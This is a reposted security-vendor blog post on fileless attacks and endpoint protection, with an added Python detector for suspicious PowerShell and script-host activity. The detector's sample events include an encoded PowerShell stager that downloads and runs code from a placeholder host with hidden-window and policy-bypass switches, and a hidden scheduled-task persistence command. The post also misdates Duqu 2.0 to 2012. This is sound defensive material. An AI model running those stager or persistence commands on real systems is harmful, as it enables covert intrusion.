This evaluation of traditional prevention tools' methods of detection, and recommendations to prevent fileless attacks, are still relevant for companies evaluating endpoint protection, or the next step in improving their security prevention posture.
Original blog posted on 13 September 2017.
Many organizations believe that using traditional anti-virus protects against all forms of attack on the endpoint. Unfortunately, daily updates and weekly scans are only as good as the threats the AV knows how to detect. Anti-virus vendors' prevention methods include heuristics (what the file does), signatures (a copy of the file), and other indicators (reputation, DNS or registry changes made, etc.). Companies also use firewalls to prevent the download, execution, and exfiltration of malware, hoping to block scripts or files with malware in them. As a quick round-up, here's what traditional AV and Next Generation Firewalls can detect and prevent, and how they do it:
What most fail to protect against are injected fileless processes. Fileless malware is not a new problem. For example, the Duqu 2.0 virus was a fileless attack reported by Kaspersky Lab all the way back in 2012.
What these attacks have in common is a shift away from executable files toward scripts that run inside browsers, Windows PowerShell and command prompts: "white-listed" programs that anti-virus scanners do not examine. More importantly, they are a real pain to detect and remove. Companies keep seeing the same executable install on their OS and have no idea where it's coming from or why the AV can't seem to remove it.
Protecting yourself goes beyond merely updating your AV and running scans periodically. There are several challenges in dealing with fileless attacks using only traditional AV and firewalls:
■ Fileless attacks never create a file, which makes file-based detection methods completely ineffective.
■ Fileless techniques used to be limited to targeted attacks and to the first stage of a browser-borne infection; now the entire attack can be fileless.
■ Fileless attacks often pivot from memory exploits to PowerShell code (which most EPP solutions do not inspect). These white-listed apps typically run with enough privilege to replicate and remove fileless components and then move on to legitimate access.
■ Enterprise patch processes aren't fast enough to keep up with the release of browser and application patches.
■ Many EPP solutions claim to protect against memory exploits and scripts, but most are vague on the details, making it hard for buyers to compare solutions.
To make an informed decision, run through scenarios with your Managed Detection and Response (MDR) vendor before investing in new endpoint software. Doing so can help you understand the role of platform-based Endpoint Detection and Response (EDR) in protecting against these issues. For most attacks, the following endpoint framework recommendations should be included in the evaluation - your IntelliGO team can help test:
1) Check the ability to detect malicious use of PowerShell, CMD and white-listed applications, including the scripts and command-line parameters they are launched with
2) Conduct Security Hygiene checks on applications to look for vulnerabilities, application versions as well as OS patches
3) Ensure you understand other tools such as the Microsoft Enhanced Mitigation Experience Toolkit as a baseline
4) Remove administrative tools like Microsoft PowerShell by restricting access through Windows Group Policy or Windows AppLocker
5) Use application control to prevent internet browsers and applications (like Microsoft Office) from spawning script interpreters (like PowerShell, WMIC, and Java)
6) Ensure Anti-Malware tools utilize machine learning, AI, exploit prevention and micro-virtualization to limit the ability of scripts to create new or polymorphic malware within your environment
7) Invest in MDR services that perform threat hunting to look for malicious application behavior in your environment proactively
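The following is an added example, not code from the original post or from IntelliGO: a small Python detector that scores Windows process-creation events (shaped like Sysmon event 1 or Security event 4688 fields) for the indicators the list above calls out. It flags PowerShell launched with attacker-style parameters (hidden window, no profile, execution-policy bypass, encoded command, in-memory download-and-execute), Office or browser processes spawning a script interpreter (the behaviour recommendation 5 blocks with application control), and a script host registering a scheduled task. The field names, weights, alert threshold and the sample events are all assumptions made for this example; the sample events are constructed, not real telemetry.

```python
"""Score Windows process-creation events for fileless-attack indicators.

Added example; the event schema, weights and sample data are assumptions.
"""
import base64
import ntpath
import re
from dataclasses import dataclass

# Interpreters that a fileless attack lives in.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe",
}
# Office and browsers: ordinary use never needs them to spawn a script host.
DOCUMENT_APPS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
}
# (canonical switch, shortest accepted prefix, explicit aliases, weight, label).
# powershell.exe accepts unambiguous prefixes of its switches, so "-nop" is -NoProfile.
PS_SWITCHES = [
    ("encodedcommand", 1, {"ec"}, 3, "encoded command"),
    ("executionpolicy", 2, {"ep"}, 2, "execution policy override"),
    ("noprofile", 3, set(), 1, "profile suppressed"),
    ("windowstyle", 1, set(), 2, "hidden window"),
    ("noninteractive", 4, set(), 1, "non-interactive"),
]
DOWNLOAD_EVAL = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b",
    re.IGNORECASE,
)
ALERT_THRESHOLD = 3  # assumed tuning value


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _decode_encoded_command(token: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE script text; '' if it does not decode."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def powershell_indicators(cmdline: str) -> list[tuple[str, int]]:
    """Return (label, weight) pairs for suspicious PowerShell switches and payload text."""
    found = []
    tokens = cmdline.split()
    script_text = cmdline  # decoded -e payloads are appended so they get scanned too
    for i, tok in enumerate(tokens):
        if not tok.startswith(("-", "/")):
            continue
        body = tok[1:].lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        for canonical, min_len, aliases, weight, label in PS_SWITCHES:
            if not (body in aliases or (len(body) >= min_len and canonical.startswith(body))):
                continue
            if canonical == "windowstyle" and not nxt.startswith("h"):
                break  # -w normal / minimized is not interesting
            if canonical == "executionpolicy" and nxt not in ("bypass", "unrestricted"):
                break
            if canonical == "encodedcommand" and i + 1 < len(tokens):
                script_text += " " + _decode_encoded_command(tokens[i + 1])
            found.append((label, weight))
            break
    if DOWNLOAD_EVAL.search(script_text):
        found.append(("in-memory download/eval", 3))
    return found


def analyze(event: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    parent = ntpath.basename(event.parent_image).lower()
    child = ntpath.basename(event.image).lower()
    reasons: list[tuple[str, int]] = []
    if parent in DOCUMENT_APPS and child in SCRIPT_HOSTS:
        reasons.append((f"{parent} spawned script host {child}", 3))
    if child in ("powershell.exe", "pwsh.exe"):
        reasons.extend(powershell_indicators(event.command_line))
    if child == "schtasks.exe" and parent in SCRIPT_HOSTS and "/create" in event.command_line.lower():
        reasons.append(("scheduled task created by a script host", 3))
    return sum(w for _, w in reasons), [label for label, _ in reasons]


def alerts(events: list[ProcEvent]) -> list[tuple[ProcEvent, int, list[str]]]:
    """Keep only events whose score reaches the alert threshold."""
    out = []
    for e in events:
        score, labels = analyze(e)
        if score >= ALERT_THRESHOLD:
            out.append((e, score, labels))
    return out


# Constructed sample events (not real telemetry). The stager text is built at runtime
# so the base64 is genuine; the host name is a placeholder.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stager.example.invalid/a')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -ep bypass -e {_ENCODED}"),
    ProcEvent(r"C:\Windows\explorer.exe",  # benign admin script: low score, no alert
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn Updater /tr "powershell -w hidden -File C:\Users\Public\u.ps1" /sc minute /mo 5'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for event, score, labels in alerts(SAMPLE_EVENTS):
        print(f"[score {score}] {ntpath.basename(event.image)}: {', '.join(labels)}")
```

Run as-is, it alerts on the first and third sample events and stays quiet on the inventory script and the plain `cmd.exe /c dir`. The decoding of `-EncodedCommand` matters: without it, the download-and-evaluate keywords in the first event would be invisible to a command-line regex, which is exactly the gap recommendation 1 asks you to test a vendor for.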
Understanding fileless attacks starts with understanding that processes that run scripts are just as dangerous as executable files. Their ability to inject DLLs and EXEs and to make privileged changes (like scheduled tasks and other Windows settings), all of which avoid detection by the AV, can cause as much damage.
To understand your exposure to such attacks, have us provide a Prevention Posture Assessment (PPA) of your environment using IntelliGO MDR software.
Further reading and examples: Fileless Malware attacks 140 banks
For the real geeks out there: Using Windows WMI for Fileless Backdoor